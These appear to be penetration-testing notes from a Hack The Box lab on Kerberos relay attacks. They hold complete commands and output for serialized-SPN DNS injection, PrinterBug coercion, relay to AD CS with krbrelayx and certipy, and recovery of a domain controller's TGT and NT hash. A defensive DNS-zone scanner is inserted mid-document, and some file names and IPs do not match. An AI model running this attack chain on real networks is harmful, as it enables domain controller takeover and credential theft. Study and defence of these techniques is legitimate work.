6. Kerberos Relay
https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx
https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
1. Exploitation
Prerequisites:
- Neither the target service nor the client may enforce encryption or signing, because we do not hold the key (the session key) needed for those operations; this is the same limitation as in NTLM relay attacks.
1.1. DCOM/RPC local activation
Abuse a DCOM object to make the system authenticate to the attacker; this requires a domain-joined machine on which commands can be executed.
Using RemoteKrbRelay
# Kerberos relay to obtain a domain controller certificate
RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
# Convert the base64-encoded certificate into a file
echo -ne "MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0B..." | base64 -d > cert.p12
# Authenticate with the certificate
certipy auth -pfx cert.p12 -dc-ip 10.129.200.138 -domain cicada.vl
1.2. Serialized SPN + DNS
By injecting a DNS record whose name is a serialized SPN, the target is tricked into performing Kerberos authentication, which upgrades an NTLM relay into a Kerberos relay.
Add the DNS record (note that a DNS label is at most 63 characters and the shortest serialized buffer is 44 characters, so your netbios_name can be at most 19 characters):
netbios_name + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
# 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA is the shortest serialized buffer, because of the DNS length limit
The client requests a Kerberos ticket for cifs/netbios_name, but actually connects to netbios_name1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
Example: relaying with krbrelayx
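From the defender's side, the same length rules can be used to audit a DNS zone for injected records. The following is an added example (not from the original notes, krbrelayx or RemoteKrbRelay): it scans (name, ip) pairs for a host label that ends in the 44-character buffer above, plus a looser heuristic for longer buffers; the scanner, the heuristic and the sample records are assumptions.

```python
import re

# Shortest serialized-SPN buffer quoted in the notes above (44 characters).
MIN_SERIALIZED_BUFFER = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"
MAX_DNS_LABEL_LEN = 63

# Heuristic (an assumption, not a format guarantee): a label made of a short
# host name followed by a base64-like tail at least as long as the minimal
# buffer, where the tail contains a run of 'A' characters (base64 'A' encodes
# zero bits, which is what the padding in the minimal buffer is), is treated
# as a probable serialized SPN even when the buffer differs from the known one.
_TAIL_RE = re.compile(
    r"^(?P<host>[A-Za-z0-9-]{1,19})(?P<buf>[A-Za-z0-9+/]{%d,})$" % len(MIN_SERIALIZED_BUFFER)
)


def classify_label(label: str):
    """Classify the first DNS label of a record name.
    Returns (verdict, host): verdict is 'exact', 'heuristic' or 'clean';
    host is the legitimate name the buffer was appended to (exact hits only)."""
    if len(label) > MAX_DNS_LABEL_LEN:
        return ("clean", None)          # not even a valid DNS label
    if label.endswith(MIN_SERIALIZED_BUFFER):
        return ("exact", label[: len(label) - len(MIN_SERIALIZED_BUFFER)])
    m = _TAIL_RE.match(label)
    if m and "AAAAAAAA" in m.group("buf"):
        return ("heuristic", None)      # host/buffer split is not reliable here
    return ("clean", None)


def find_serialized_spn_records(records):
    """records: iterable of (fqdn, ip) pairs, e.g. from an AD DNS zone dump.
    Returns the records whose host label looks like an injected serialized SPN."""
    hits = []
    for fqdn, ip in records:
        label = fqdn.split(".", 1)[0]
        verdict, host = classify_label(label)
        if verdict != "clean":
            hits.append({"name": fqdn, "ip": ip, "verdict": verdict, "host": host})
    return hits


# Constructed sample zone records: the first two reuse names and addresses from
# the notes above; the third is a made-up benign host for contrast.
SAMPLE_RECORDS = [
    ("DC-JPQ225.cicada.vl", "10.129.234.48"),
    ("DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.cicada.vl", "10.10.14.86"),
    ("fileserver01.cicada.vl", "192.0.2.10"),
]

if __name__ == "__main__":
    for hit in find_serialized_spn_records(SAMPLE_RECORDS):
        print(f"[{hit['verdict']}] {hit['name']} -> {hit['ip']} (host: {hit['host']})")
```

Feed it the A records of the AD-integrated zone (or the dnsNode objects under the zone container) and review every hit together with who created it, since legitimate hosts never carry such a tail.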
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord "DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA" 10.10.14.86
[+] DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc smb DC-JPQ225.cicada.vl -k -u rosie.powell -p Cicada123 -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [*] x64 (name:DC-JPQ225) (domain:cicada.vl) (signing:True) (SMBv1:None) (NTLM:False)
SMB DC-JPQ225.cicada.vl 445 DC-JPQ225 [+] cicada.vl\rosie.powell:Cicada123
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 VULNERABLE, PrinterBug
COERCE_PLUS DC-JPQ225.cicada.vl 445 DC-JPQ225 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# krbrelayx.py -t http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp --adcs --template DomainController
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 92
[*] Writing PKCS#12 certificate to ./unknown5898$.pfx
[*] Certificate successfully written to file
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx unknown7148\$.pfx -dc-ip 10.129.234.48
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
Using certipy
certipy relay -target 'http://dc-jpq225.cicada.vl/' -template DomainController
bloodyAD -u Rosie.Powell -p Cicada123 -d cicada.vl -k --host DC-JPQ225.cicada.vl add dnsRecord DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA 10.10.14.86
nxc smb DC-JPQ225.cicada.vl -k --use-kcache -M coerce_plus -o L=DC-JPQ2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA M=PrinterBug
certipy auth -pfx dc-jpq225.pfx -dc-ip 10.129.200.138
The following is an AI-generated explanation:
Target address format
│
├── IP address (e.g. 10.10.10.10)
│   └── ❌ cannot build an SPN → uses NTLM
│
├── NetBIOS name (e.g. DC01)
│   └── tries Kerberos → may fall back to NTLM
│
├── FQDN (e.g. dc01.domain.local)
│   └── tries Kerberos (SPN: HOST/dc01.domain.local)
│       → falls back to NTLM on failure
│
└── Serialized SPN format (e.g. DC-JPQ2251UWhRC...)
    └── ✅ forces Kerberos, no NTLM fallback